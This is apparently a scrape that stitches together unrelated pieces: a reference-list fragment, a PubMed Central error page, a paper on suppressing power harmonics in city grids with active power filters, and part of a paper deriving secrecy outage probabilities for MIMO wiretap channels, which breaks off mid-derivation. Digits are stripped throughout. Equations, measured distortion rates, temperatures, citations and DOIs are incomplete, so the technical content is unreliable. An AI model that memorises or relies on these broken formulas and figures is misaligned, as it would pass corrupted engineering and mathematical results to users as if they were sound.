pages – . acm. aki vehtari, andrew gelman, and jonah gabry. . practical bayesian model evaluation us- ing leave-one-out cross-validation and waic. statistics and computing, ( ): – . jacob whitehill, ting-fan wu, jacob bergsma, javier r. movellan, and paul l. ruvolo. . whose vote should count more: optimal in- tegration of labels from labelers of unknown expertise. in advances in neural information processing systems , pages – . curran associates, inc. w. john wilbur. . non-parametric signif- icance tests of retrieval performance com- parisons. journal of information science, ( ): – . https://doi.org/ . /s - - - https://doi.org/ . /s - - - http://papers.nips.cc/paper/ -whose-vote-should-count-more-optimal-integration-of-labels-from-labelers-of-unknown-expertise.pdf http://papers.nips.cc/paper/ -whose-vote-should-count-more-optimal-integration-of-labels-from-labelers-of-unknown-expertise.pdf http://papers.nips.cc/paper/ -whose-vote-should-count-more-optimal-integration-of-labels-from-labelers-of-unknown-expertise.pdf https://doi.org/ . / https://doi.org/ . / https://doi.org/ . / wp-p m- .ebi.ac.uk params is empty sys_ exception wp-p m- .ebi.ac.uk no params is empty exception params is empty / / - : : if (typeof jquery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/ . . /js/jig.min.js"][/script]'.replace(/\[/g,string.fromcharcode( )).replace(/\]/g,string.fromcharcode( ))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} page not available reason: the web page address (url) that you used may be incorrect. message id: (wp-p m- .ebi.ac.uk) time: / / : : if you need further help, please send an email to pmc. include the information from the box above in your message. otherwise, click on one of the following links to continue using pmc: search the complete pmc archive. browse the contents of a specific journal in pmc. find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/med/ 有色金属矿山电能质量 international journal of advanced network, monitoring and controls volume , no. , solutions for governance and suppression of power harmonic in cities li xiangchu hunan nonferrous metals vocational and technical college zhuzhou, hunan, , china e-mail: hnysjxjwk@ .com zhang wei hunan nonferrous metals vocational and technical college zhuzhou, hunan, , china abstract—based on the current status of cities’ power sup ply and distribution system, this paper conducts theoretica l and experimental investigations over the generation, harz ards as well as the restraining and suppression techniques of power harmonics. a solution of scheme selection for c ontrolling and suppressing power harmonics suitable for t he current power supply and distribution system of big a nd medium-sized cities is proposed. this study not only p rovides important implications for big and medium-sized c ities, but also provides substantial reference value for cont rolling and suppressing power harmonics in the public util ity system in china. keywords-power harmonic; governance and suppression; solution i. introduction with the transformation and upgrading of industrial cities, the application of nonlinear load like converter, rectifier and inverter that use power semiconductor-cored insulated gate bipolar transistor (igbt) and intelligent power module (ipm) has been widely used. while plenty of high power nonlinear converter equipments have their advancement and reliability in energy saving and controlling technology, its inherent characteristics will generate a large amount of harmonic, causing voltage and current waveform distortion in power supply system. [ ] the consequence is that the power quality of utility grid is not up to standard or even worse, and the normal running and safety of utility grid and electrical equipment is badly influenced. therefore, researches on the restraining and suppressing of power harmonics in urban utility grid have sound theoretical and practical values over improving power quality so as to better service the transformation and upgrading of the city. ii. cause of power harmonic power harmonic in city utility grid is mainly produced in the nonlinear load power equipment such as impact load, asymmetry load and the nonlinear load, with nonlinear load as the most important factor to produce electric power harmonic. [ ] inverter, uninterruptible power supply (ups) and power converter equipment (such as rectifier and inverter), industrial computer and other high power nonlinear load are the harmonic source of utility grid. [ ] with the transformation and upgrading of the inverter control in industrial control and other fields, the application of frequency converter is undergoing a wide spread. therefore, inverter has become the main source of electric power harmonic in urban public grid. iii. hazard of power harmonics the harm caused by harmonic pollution of urban public power grid is reflected in many aspects. the main contents are as following. ) reducing the utilization rate of electrical equipment makes transformer, motor, power capacitors and other electrical equipments, as well as cables, low pressure neutral line, busbar and other conductors working under the state of overload operation such as vibration, fever, abnormal sound, and etc. it shortens the service life of the electric power and increase electric energy loss.[ ] ) interfering with relay protection, automatic devices and computer systems; making the precision electronic equipment work abnormal, or even burn; increasing the error of measuring and measuring instruments.[ ] doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , ) reducing the quality of signal transmission and interfering communication system. usually harmonics of ~ hz generates communication noise, while harmonics above hz lead to the disoperation of the signal of the telephone circuit. [ ] iv. governance and suppression of power harmonic in engineering, the governance and suppression of power harmonic in city utility grid is mainly divided into the following three types: ) series detuning reactor harmonic resonance amplifier is the main purpose of the measures to prevent because of reactive power compensation device (such as electric power capacitor, etc.) access to enlarge the excessive power harmonic and resonance occurs, but smaller filtering effect. [ - ] ) using passive power filter (pf) for harmonic governance. the passive power filter (pf) is a filter circuit that makes use of the combination of inductance, capacitance and resistance to filter out one or multiple harmonics. it is currently the basic ways of city utility grid management and power harmonics restraining. despite of its merits such as simple structure, low cost, reliable running and low-cost operating, still the harmonic governance effect is not ideal, and could lead to new problems such as oscillation of power supply and distribution system and harmonic amplification. [ ] ) using active power filter (apf) for harmonic governance. the active power filter (apf) is a new type of special equipment based on modern power electronic technology and digital signal processing technology to govern electric power harmonics.[ ] the basic principle of harmonic elimination is electricity generated during runtime equals the current amplitude of power harmonic, reversal polarity of harmonic current into the power supply system and compensate or offset the electric power harmonic current, and take the initiative to eliminate electric power harmonic. it has the merits of high control precision, fast response, good harmonic elimination effect and etc. active power filter (apf) is a new research that enjoys a promising prospect in the field of future electric power harmonic governance and comprehensive optimization of power quality. v. solution for governance and suppression of power harmonic in cities a. about general solution with increasingly attention paid to the governance of electric power harmonic, related industries get fast development during the period of “china's th five-year plan”. there are a large variety of measures and products for the governance of electric power harmonic. establishing reasonable selection schemes can guide technical personnel to choose measures and products according to the actual circumstance of electric power harmonic in power supply and distribution system. [ ] based on the harmonic voltage limit and harmonic current allowable value regulated in the utility grid national standard gb/t - utility grid harmonic power quality, [ ] this paper sets the nominal voltage of . kv for example, and establishes a model selection scheme for the power harmonic governance and suppression of urban utility grid, as is shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . model selection for power harmonic governance and suppression b. specific solution for power harmonic governance and suppression by using technological upgrading projects as engineering case, this paper conducts researches on solutions for power harmonic governance and suppression. ) about technological upgrading projects: a utility grid in hunan is mainly composed of one transformer s - , equipped with kvar pgj type of reactive power compensation device. load is composed of sets of kva ups, switching power supply and air conditioning. when the system runs, output cable of the transformer reaches degrees centigrade, cable vibration and electronic equipment interference become bigger. [ ] customer’s technological upgrading requirements are as following: a) lowering the temperature rise of the cable and eliminating cable vibration; b) reducing interference of electronic devices. ) intended solutions: based on customer’s technological upgrading requirements, the project group did a lot of resourcing work and field investigation to make sure the design rationality of this power supply and distribution system. field test shows the distortion rate of voltage total harmonic was . %, the distortion rate of current total harmonic was . %. ups and six pulse rectifier are the main nonlinear load that generate harmonics. comparative analysis of these data proves that this project is under serious harmonic pollution and hazard. according to figure , the choice of active power filter can effectively suppress the electric power harmonic. detailed solutions are as following: a) retaining reactive power compensation device pgj type kvar; b) one set of leapf - . active power filter installed into two sets of ups respectively. ) verification: after installation and debugging, voltage, current waveform and harmonic analysis of the power supply and distribution system are tested on the spot, and data before and after the power harmonic control and suppression are shown in figure and figure . harmonic pollution is slight international journal of advanced network, monitoring and controls volume , no. , a) voltage and current waveform-before b) voltage and current waveform-after c) voltage harmonic analysis-before d) voltage harmonic analysis-after figure . voltage waveform and harmonic analysis before and after power harmonic governance and suppression a) current rms and waveform-before b) current rms and waveform-after c) current harmonics analysis-before d) current harmonics analysis-after figure . current waveform and harmonic analysis before and after power harmonic governance and suppression international journal of advanced network, monitoring and controls volume , no. , it can be seen from figure figure that after harmonic control and suppression, the total harmonic distortion rate of the power supply and distribution system is reduced to . %; the total harmonic distortion rate of current is reduced to . %; the temperature in output-end cable of the transformer is degree centigrade when room temperature is degree centigrade; the cable vibration and electronic equipment interference are eliminated. [ - ] after field tests and function verifications, the solution above turns out to be reasonable and achieves the intended goals. vi. conclusion based on the harmonic voltage limit and harmonic current allowable value regulated in the utility grid national standard gb/t - utility grid harmonic power quality, a model selection scheme for the power harmonic governance and suppression of urban utility grid is established after theoretical and experimental studies on the causes, hazards as well as the governance and suppression technology. by using technological upgrading projects as engineering case, this paper proposes a solution that uses active power filter (apf) as the core device. after field test and functional verification, the scheme proves to be both reasonable and practical. it is a reference for the power supply and distribution system design of urban utility grid. references [ ] gb/t - , quality of electric energy supply harmonics in public supply network [s]. [ ] pan zhaodong. design of single-phase harmonic control system in mine [j]. industrial and mining automation, . . [ ] chen xuemei. analysis and management of frequency conversion harmonics of low voltage power grid in oil field [j] .electrical applications, . . [ ] li lanfang. harmonic analysis and hazard management of coal mine variable frequency speed control system [j] .science and technology of coal, . . [ ] li honghui. research on harmonic management of coal mine dc hoist system [j] .coal project engineering, . . [ ] zhang zhicheng. research on harmonic management method of isolated island micro - grid [j] .power electronics technology, . . [ ] jiang youhua. decoupling and stability optimization of multi-harmonic source control system with tree distribution [j] .the grid technology, . . [ ] ge shaoyun. an empirical method for harmonic loss reduction of distribution network [j] .journal of electrical systems and automation, . . [ ] wang huiwu. power harmonic detection and estimation based on nonlinear theory [j] .electrical measurement and meter, . . [ ] li demin. power harmonic analysis based on fft interpolation of four spectral line of nuttal window [j] .power system protection pre-control, . . [ ] chen dongyi. new parallel active power filter with current control [j] .experimental technology and management, . . [ ] zheng kang. discussion and application of harmonic wave and its control technology in mine power supply and distribution system [j] .the information of power, . . [ ] sun yunfei. research and application of harmonic control technology in jiao-jia gold mine [j] .electric power energy saving, . . [ ] zhang jingwei. power quality control of power supply and distribution system in metallurgical plant [j] .water conservancy and power industry, . . [ ] zhao yuman. research on harmonic suppression and reactive power compensation in power system [d] .liaoning university of technology, . . submitted december accepted march published april corresponding author kiattisak maichalernnukul, kiattisak.m@rsu.ac.th academic editor shlomi dolev additional information and declarations can be found on page doi . /peerj-cs. copyright maichalernnukul distributed under creative commons cc-by . open access on the secrecy performance of transmit- receive diversity and spatial multiplexing systems kiattisak maichalernnukul college of digital innovation and information technology, rangsit university, pathum thani, thailand abstract emerging from the information-theoretic characterization of secrecy, physical-layer security exploits the physical properties of the wireless channel for security purpose. in recent years, a great deal of attention has been paid to investigating the physical-layer security issues in multiple-input multiple-output (mimo) wireless communications. this paper analyzes the secrecy performance of transmit-receive diversity system and spatial multiplexing systems with zero-forcing equalization and minimum mean- square-error equalization. specifically, exact and asymptotic closed-form expressions are derived for the secrecy outage probability of such mimo systems in a rayleigh fading environment, and the corresponding secrecy diversity orders and secrecy array gains are determined. numerical results are presented to corroborate the analytical results and to examine the impact of various system parameters, including the numbers of antennas at the transmitter, the legitimate receiver, and the eavesdropper. these contributions bring about valuable insights into the physical-layer security in mimo wireless systems. subjects computer networks and communications, security and privacy keywords physical-layer security, secrecy outage probability, transmit-receive diversity, multiple-input multiple-output, spatial multiplexing introduction wireless communication systems are intrinsically prone to eavesdropping because of the open nature of the wireless medium. in this context, physical-layer security arising from the information-theoretic analysis of secrecy has attracted a lot of interest so far. this approach indeed takes advantage of the physical characteristics of the radio channel to support secure communications. groundbreaking works on physical-layer security (wyner, ; csiszár & körner, ; leung-yan-cheong & hellman, ; bloch et al., ) focused on a basic wiretap channel, where the transmitter, the legitimate receiver, and the eavesdropper possess a single antenna, and established the so-called secrecy capacity. one of their common remarks was that to have a positive secrecy capacity, the channel quality of the transmitter–receiver link has to be better than that of the transmitter-eavesdropper link. stimulated by advances in multiple-antenna technology for wireless communications, the physical-layer security issues in multiple-input multiple-output (mimo) wiretap how to cite this article maichalernnukul k. . on the secrecy performance of transmit-receive diversity and spatial multiplexing sys- tems. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:kiattisak.m@rsu.ac.th mailto:kiattisak.m@rsu.ac.th https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. in our context, a mimo wiretap channel implies that there are multiple antennas at the transmitter, the legitimate receiver, and the eavesdropper. this is generally known as co-located mimo. for a discussion on its alternative, called distributed or cooperative mimo, readers are referred to (dong et al., ; he, man & wang, ; zou, wang & shen, ; wang et al., a). for this kind of channel, the channel gains are allowed to change from channel use to channel use (poor & schaefer, ). channels have been recently explored in the literature (goel & negi, ; khisti & wornell, ; oggier & hassibi, ; mukherjee & swindlehurst, ; yang et al., ; ferdinand, da costa & latva-aho, ; lin, tsai & lin, ; wang, wang & ng, ; schaefer & loyka, ; wang et al., b; maichalernnukul, ). a brief overview of these works is provided in the following subsection. related works in khisti & wornell ( ), a closed-form expression for the secrecy capacity of the gaussian mimo wiretap channel was derived from solving a minimax problem. meanwhile, the problem of computing the perfect secrecy capacity of such a channel was analytically investigated in oggier & hassibi ( ). by relaxing the assumption of perfect channel state information (csi) used in khisti & wornell ( ), oggier & hassibi ( ), schaefer & loyka ( ) studied the secrecy capacity of the compound gaussian mimo wiretap channel. in mukherjee & swindlehurst ( ), a few beamforming schemes were proposed to improve the secrecy capacity of the gaussian mimo wiretap channel in the presence of csi errors. with the objective of achieving perfect secrecy at the physical layer, mimo precoding and postcoding designs using the signal-to-noise ratio (snr) criterion were presented in lin, tsai & lin ( ). in all aforementioned works, the channel was assumed to be fixed over the whole transmission time. more precisely, the channel gains for the gaussian mimo wiretap channel are constant. this is rarely practical for the wireless medium as multipath propagation normally makes transmission conditions vary with time (poor & schaefer, ). such variation is called fading. in (yang et al., ; ferdinand, da costa & latva- aho, ; maichalernnukul, ), the secrecy capacity of the fading mimo wiretap channel was characterized. specifically, yang et al. ( ) focused on the physical-layer security enhancement through transmit antenna selection in a flat-fading mimo channel, and characterized the corresponding performance in terms of the secrecy outage probability and the probability of non-zero secrecy capacity. in the meantime, ferdinand, da costa & latva-aho ( ) analyzed the secrecy outage probability of orthogonal space–time block code (ostbc) mimo systems when the transmitter–receiver and transmitter- eavesdropper links experience different kinds of fading. in contrast to space–time coding (which is based on transmit diversity), transmit beamforming and receive combining (which is based on transmit-receive diversity) achieve additional array gain (tse & viswanath, ). besides, goel & negi ( ) showed that multiple transmit antennas can be deployed to generate artificial noise, such that only the transmitter-eavesdropper link is degraded. this idea enables secret communication (csiszár & körner, ) and has been extended to more practical mimo scenarios, e.g., frequency-division duplex systems (wang, wang & ng, ) and heterogeneous cellular networks (wang et al., b). more recently, in maichalernnukul ( ), the average secrecy capacity of transmit- receive diversity systems in the fading mimo wiretap channel and its upper bound were derived in closed form. nevertheless, the corresponding secrecy outage probability has not been investigated yet. there are two reasons why we should study this performance. first, maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the rationale for using these ‘‘classical’’ detection techniques for the spatial multiplexing mimo systems is twofold. first, the zf and mmse detectors are the basic building blocks of advanced mimo communication architectures (e.g., layered space–time architectures (foschini, ; seethaler, artés & hlawatsch, ) and joint transmit-receive equalizers (palomar & lagunas, ; jiang, li & hager, )), and have been extensively addressed in the mimo literature (jankiraman, ; biglieri et al., ; heath jr & lozano, ). second, they have low computational complexity compared to the (optimum) maximum likelihood (ml) detector, and their performance can be very close to the ml performance for a well-conditioned mimo channel, i.e., its condition number is near to unity (see seethaler, artés & hlawatsch ( ) for more details). the closed-form results of maichalernnukul ( ) are complicated, and from these results, it is not clear how the system parameters (e.g., the numbers of antennas at the transmitter, the legitimate receiver, and the eavesdropper) affect the secrecy performance. in fact, quantifying the secrecy outage probability at high snr in terms of two parameters, namely secrecy diversity order and secrecy array gain, can provide insights into this effect (yang et al., ). second, it was shown in bashar, ding & li ( ) that although transmit beamforming in the transmit-receive diversity systems maximizes the achievable capacity of the main channel (i.e., that for the transmitter–receiver link), they still have secrecy outages at an arbitrary target secrecy rate. the first objective of our work is to present the exact and asymptotic (high-snr) analysis of the secrecy outage probability of these systems. it is well known that the multiple antennas of mimo systems can be exploited to obtain spatial multiplexing, i.e., transmission of independent data streams in parallel (tse & viswanath, ). this leads to an increase in the data rate. while several key performance metrics of spatial multiplexing mimo systems, e.g., error probability, outage and ergodic capacity, have been extensively studied in the literature (chen & wang, ; smith, ; ordóñez et al., ; kumar, caire & moustakas, ; jiang, varanasi & li, ), little is known about the secrecy performance of these systems in the fading mimo wiretap channel. the second objective of our work is to fill this knowledge gap by providing a relevant secrecy outage probability characterization. contributions the main contributions of this work are summarized as follows: • we derive exact and asymptotic closed-form expressions for the secrecy outage probability of a transmit-receive diversity system in the fading mimo wiretap channel. we also do the same for the secrecy outage probability of spatial multiplexing systems with linear equalization, especially zero-forcing (zf) and minimum mean-square-error (mmse). it is shown that all exact secrecy outage results simplify to the well-known result (bloch et al., , equation ( )) for the case where the transmitter, the legitimate receiver, and the eavesdropper have a single antenna. • we determine the secrecy diversity order and secrecy array gain that the above systems achieve, and discuss the impact of the numbers of antennas at the transmitter, the legitimate receiver, and the eavesdropper, denoted as mt, mr, and me, respectively, on the system secrecy and complexity. through numerical results, it is verified that the transmit-receive diversity system attains a secrecy diversity order of mtmr, while the spatial multiplexing systems with zf equalization and mmse equalization yield the same secrecy diversity order of mr−mt+ . all of these secrecy diversity orders turn out to be independent of me. notation and organization throughout this paper, we write a function g(x) of variable x as o(x) if limx→ g(x) x = , and denote ( · · ) as the multinomial coefficient, e[·] as the expectation operator, ddx (·) as the first derivative operator with respect to variable x, ‖·‖ as the euclidean norm of a vector, and in as the identity matrix of size n ×n . moreover, det(·), (·)t, (·)†, (·)− , and [·]ij maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this assumption holds, for example, if the receiver and eavesdropper are able to perfectly estimate hr and he, respectively, and the receiver sends hr to the transmitter through a noiseless broadcast channel, which can be heard by the eavesdropper (goel & negi, ). denote the determinant, transpose, conjugate transpose, inverse, and (i,j)-th element of a matrix, respectively, and ϒ(·,·) and (·,·) are the lower and upper incomplete gamma functions defined in (gradshteyn & ryzhik, , equation ( . . )) and (gradshteyn & ryzhik, , equation ( . . )), respectively. we also denote cn( ,k) as a zero-mean circularly-symmetric complex gaussian distribution with covariance k (gallager, , section . . ), and lmax{·} and p{·} as the largest eigenvalue of a square matrix and the associated eigenvector, respectively. the layout of the paper is as follows. ‘system model’ describes the system model of interest. ‘exact secrecy outage probability’ and ‘asymptotic secrecy outage probability’ present exact and asymptotic analysis of the corresponding secrecy outage probability, respectively. ‘numerical results’ provides the numerical results of theoretical analysis and simulations, followed by the conclusion given in ‘conclusion’. system model in this section, we consider transmit-receive diversity and spatial multiplexing systems where the transmitter, the legitimate receiver, and the passive eavesdropper are equipped with mt, mr, and me antennas, respectively. the instantaneous secrecy capacity of these systems is given by (bloch et al., , lemma ) cs= {log ( +γr)−log ( +γe), if γr >γe , if γr≤γe ( ) where γr and γe are the instantaneous received snrs at the receiver and the eavesdropper, respectively. transmit-receive diversity system for the transmit-receive diversity system, the received signal vector at the legitimate receiver, yr ∈cmr× , and that at the passive eavesdropper, ye ∈cme× , depend on the transmitted symbol s∈c (with e[|s| ]=p) according to yr=hrwts+nr ( ) and ye=hewts+ne ( ) respectively, where wt∈cmt× is the transmit weight (beamforming) vector, and nr and ne are independent circularly-symmetric complex-valued gaussian noises: nr∼cn( ,σ r imr) and ne∼cn( ,σ e ime). we focus on a rayleigh-fading wiretap channel, meaning that the channel matrices hr and he have independent identically-distributed cn( , ) entries. in addition, we assume that the three terminals know hr, but he is available only at the eavesdropper. the receiver estimates the symbol s by applying the receive weight (combining) vector zr to the received signal vector yr: z†ryr=z † rhrwts+z † rnr. maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the optimal choices of wt and zr in the sense of maximizing the snr of this estimate (i.e., the instantaneous received snr) are given by dighe, mallik & jamuar ( ) wt= h†rzr ‖h†rzr‖ and zr=p{hrh†r} respectively, and the resultant snr is γr,tr= γ̄rlmax{hrh†r} ( ) where γ̄r = p σ r is the average snr at the receiver. the subscript tr refers to the transmit-receive diversity system, and is sometimes used to avoid confusion between this system and the spatial multiplexing system. let λ=lmax{hrh † r}, l=min(mt,mr), and k =max(mt,mr). the cumulative distribution function (cdf) of λ is given by dighe, mallik & jamuar ( ) fλ(x)= det(s(x))[∏l p= (k −p)!(l−p)! ] ( ) where s(x) is the l×l hankel matrix with [s(x)]ij =ϒ(|mt−mr|+i+j− ,x). by careful inspection of the entries of s(x), this cdf can be rewritten as fλ(x)= l∑ m= (mt+mr− m)m∑ n=|mt−mr| am,n n! ϒ(n+ ,mx) ( ) where am,n = cm,nn! mn+ [∏l p= (k−p)!(l−p)! ] and cm,n is the coefficient computed by using curve fitting on the plot of ddx det(s(x)) (dighe, mallik & jamuar, ). using eq. ( ) and (papoulis & pillai, , example - ), the cdf of γr,tr in eq. ( ) is given by fγr,tr(x)= l∑ m= (mt+mr− m)m∑ n=|mt−mr| am,n n! ϒ ( n+ , mx γ̄r ) . ( ) similarly, the eavesdropper can estimate the symbol s as z†eye=z † ehewts+z † ene where the receive weight vector ze= hewt ‖hewt‖ is chosen to maximize the snr of the estimate, yielding γe,tr= γ̄e‖hewt‖ ( ) maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. where γ̄e = p σ e is the average snr at the eavesdropper. the probability density function (pdf) of γe,tr in eq. ( ) is given by maichalernnukul ( ) fγe,tr(x)= xme− e− x γ̄e (me− )!γ̄ me e . ( ) spatial multiplexing system unlike the transmit-receive diversity system, the spatial multiplexing system allows the simultaneous transmission of different symbols, i.e., the ith antenna (i= , ,...,mt) at the transmitter is used to transmit the symbol si∈c (with e[|si| ]=p) . let s=[s ,s ,...,smt]t. the received signal vectors at the legitimate receiver and the passive eavesdropper are given, respectively, by yr=hrs+nr where hr and nr are defined in eq. ( ), and ye=hes+ne where he and ne are defined in eq. ( ). we assume that the receiver and the eavesdropper know hr and he, respectively, and the numbers of antennas at these two terminals (mr and me) are no less than the number of antennas at the transmitter (mt). the assumption on mt, mr, and me is necessary for the theoretical analysis hereafter. in order for the receiver to estimate s, the zf or mmse receive weight (equalizing) matrix is applied to yr. these matrices are given by tse & viswanath ( ) wr,zf= ( h†rhr )− h†r and wr,mmse= ( h†rhr+ γ̄r imt )− h†r. it is noteworthy that as the average snr at the receiver grows very large, i.e., γ̄r →∞, wr,mmse approaches wr,zf. left multiplying yr by wr,zf and wr,mmse, we obtain the ith symbol estimate (i= , ,...,mt), the snrs of which are, respectively, (jiang, varanasi & li, ) γr,zf,i= γ̄r[( h†rhr )− ] ii ( ) and γr,mmse,i= γ̄r[( h†rhr+ γ̄r imt )− ] ii − . ( ) the cdfs of γr,zf,i and γr,mmse,i are given, respectively, by chen & wang ( ) fγr,zf(x)= −e − x γ̄r mr−mt∑ m= xm m!γ̄mr ( ) maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and smith ( ) fγr,mmse(x)= − e− x γ̄r (x+ )mt− mr− ∑ m= dmx m ( ) where dm= ∑m n=max( ,m−mt+ ) (mt− m−n ) n!γ̄nr . the symbol index i is omitted from eqs. ( ) and ( ) because all the elements of hr are statistically independent and identically distributed. similarly, the eavesdropper performs zf or mmse equalization, and the resulting snrs of the ith symbol estimate (i.e., γe,zf,i and γe,mmse,i) can be expressed, respectively, as eqs. ( ) and ( ) with the subscript r being replaced by the subscript e. replacing the subscript r with the subscript e in eqs. ( ) and ( ), and taking the derivative of these equations with respect to x, we obtain the pdfs for γe,zf,i and γe,mmse,i, respectively, as fγe,zf(x)= xme−mte− x γ̄e (me−mt)!γ̄ me−mt+ e ( ) and fγe,mmse(x)= e− x γ̄e (x+ )mt me− ∑ m= gm [ xm+ γ̄e + ( mt+ γ̄e −m− ) xm−mxm− ] ( ) where gm is similar to dm, except that the subscript r is replaced by the subscript e. exact secrecy outage probability the secrecy outage probability is defined as the probability that the instantaneous secrecy capacity is less than a target secrecy rate r > (bloch et al., ). from eq. ( ), this performance metric can be expressed as pout(r)=pr{cs <r} =pr { γr < r γe+ r − } = ∫ ∞ fγe(v)fγr ( rv+ r− ) dv. ( ) transmit-receive diversity system from eqs. ( ), ( ) and ( ), we can derive the exact secrecy outage probability for the transmit-receive diversity system as follows: pout,tr(r)= (me− )!γ̄ me e l∑ m= (mt+mr− m)m∑ n=|mt−mr| am,n n! ∫ ∞ vme− e− v γ̄e ×ϒ ( n+ , ( rv+ r− )m γ̄r ) dv = (me− )!γ̄ me e l∑ m= (mt+mr− m)m∑ n=|mt−mr| am,n [∫ ∞ vme− e− v γ̄e dv −e− ( r− )m γ̄r n∑ k= ( m γ̄r )k k∑ l= lr( r− )k−l l!(k−l)! ∫ ∞ vl+me− e − ( rm γ̄r + γ̄e ) v dv ] maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. = − (me− )!γ̄ me e l∑ m= (mt+mr− m)m∑ n=|mt−mr| am,ne − ( r− )m γ̄r n∑ k= ( m γ̄r )k × k∑ l= (l+me− )! lr( r− )k−l l!(k−l)! ( rm γ̄r + γ̄e )l+me ( ) where the second equality is obtained by using (gradshteyn & ryzhik, , equations ( . ) and ( . . )), and the last equality is obtained by using (gradshteyn & ryzhik, , equation ( . . )) and (maaref & aïssa, , equation ( )). for the special case of mt=mr=me= , the secrecy outage probability expression in eq. ( ) reduces to pout,tr(r)= − γ̄re − r− γ̄r γ̄r+ rγ̄e ( ) which agrees exactly with a result given in (bloch et al., , equation ( )). spatial multiplexing system from eqs. ( ), ( ) and ( ), we can derive the exact secrecy outage probability for the spatial multiplexing system with zf equalization as follows: pout,zf(r)= ∫ ∞ fγe,zf(v)dv− e− r− γ̄r (me−mt)!γ̄ me−mt+ e mr−mt∑ m= m!γ̄mr × ∫ ∞ ( rv+ r− )mvme−mte − ( r γ̄r + γ̄e ) v dv = − e− r− γ̄r (me−mt)!γ̄ me−mt+ e mr−mt∑ m= γ̄mr m∑ n= nr( r− )m−n n!(m−n)! × ∫ ∞ vn+me−mte − ( r γ̄r + γ̄e ) v dv = − e− r− γ̄r (me−mt)! ( rγ̄e γ̄r + )me−mt+ × mr−mt∑ m= γ̄mr m∑ n= nr( r− )m−n(n+me−mt)! n!(m−n)! ( r γ̄r + γ̄e )n ( ) where the second equality is obtained by using (gradshteyn & ryzhik, , equation ( . )) and (papoulis & pillai, , equation ( - )), and the last equality is obtained by using (gradshteyn & ryzhik, , equation ( . . )). for the special case of mt=mr=me= , eq. ( ) simplifies to eq. ( ). meanwhile, the secrecy outage probability for the spatial multiplexing system with mmse equalization can be derived from eqs. ( ), ( ) and ( ) as follows: maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. pout,mmse(r)= ∫ ∞ fγe,mmse(v)dv− e− r− γ̄r (mt− )r me− ∑ m= gm mr− ∑ n= dn × [∫ ∞ ( rv+ r− )ne − ( r γ̄r + γ̄e ) v (v+ ) mt− × [vm+ γ̄e + ( mt+ γ̄e −m− ) vm−mvm− ] dv ] = − e γ̄r + γ̄e (mt− )r me− ∑ m= gm mr− ∑ n= dn n∑ k= ( n k ) (− )k (n−k)r × [ γ̄e m+ ∑ l = ( m+ l ) (− )l ∫ ∞ vm+n−k−l − mt+ e − ( r γ̄r + γ̄e ) v dv + ( mt+ γ̄e −m− ) m∑ l = ( m l ) (− )l ∫ ∞ vm+n−k−l − mt+ e − ( r γ̄r + γ̄e ) v dv +m m− ∑ l = ( m− l ) (− )l ∫ ∞ vm+n−k−l − mte − ( r γ̄r + γ̄e ) v dv ] = − e γ̄r + γ̄e (mt− )r me− ∑ m= gm mr− ∑ n= dn n∑ k= ( n k ) (− )k (n−k)r × [ γ̄e m+ ∑ l = ( m+ l )(− )l (m+n−k−l − mt+ , rγ̄r + γ̄e )( r γ̄r + γ̄e )m+n−k−l − mt+ + ( mt+ γ̄e −m− ) m∑ l = ( m l )(− )l (m+n−k−l − mt+ , rγ̄r + γ̄e )( r γ̄r + γ̄e )m+n−k−l − mt+ +m m− ∑ l = ( m− l )(− )l (m+n−k−l − mt+ , rγ̄r + γ̄e )( r γ̄r + γ̄e )m+n−k−l − mt+ ] ( ) where the second equality is obtained by changing the limits of integration and using (gradshteyn & ryzhik, , equation ( . )) and (papoulis & pillai, , equation ( - )), and the last equality is obtained by using (gradshteyn & ryzhik, , equation ( . . )). for the special case of mt=mr=me= , eq. ( ) reduces to eq. ( ). asymptotic secrecy outage probability in this section, we focus on deriving the asymptotic secrecy outage probability of the aforementioned systems as γ̄r →∞. this expression enables one to analyze the secrecy performance in the high-snr regime through two performance indicators: secrecy diversity order and secrecy array gain (yang et al., ). the secrecy diversity order indicates the slope of the secrecy outage probability versus γ̄r curve at high snr in a log–log scale, whereas maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the secrecy array gain indicates the shift of the curve with respect to the benchmark secrecy outage curve. transmit-receive diversity system first, we look for a first-order expansion of eq. ( ), which will be immediate from a first-order expansion of det(s(x)). following the approach outlined in (mckay, , appendix b. ) and using (kalman, , equations ( ) and ( )), it is straightforward to show that the first-order taylor expansion of det(s(x)) around x = is det(s(x))= [ l∏ p= (k −p)![(l−p)!] (mt+mr−p)! ] xmtmr+o ( xmtmr ) . ( ) substituting eq. ( ) into eq. ( ) yields fλ(x)= [ l∏ p= (l−p)! (mt+mr−p)! ] xmtmr+o ( xmtmr ) . ( ) using eq. ( ) and (papoulis & pillai, , example - ), the first-order expansion of the cdf of γr,tr is given by fγr,tr(x)= [ l∏ p= (l−p)! (mt+mr−p)! ]( x γ̄r )mtmr +o (( x γ̄r )mtmr) . ( ) using eqs. ( ), ( ) and ( ), and following the same procedure as used in eq. ( ), an asymptotic expression for pout,tr(r) with γ̄r→∞ is obtained as 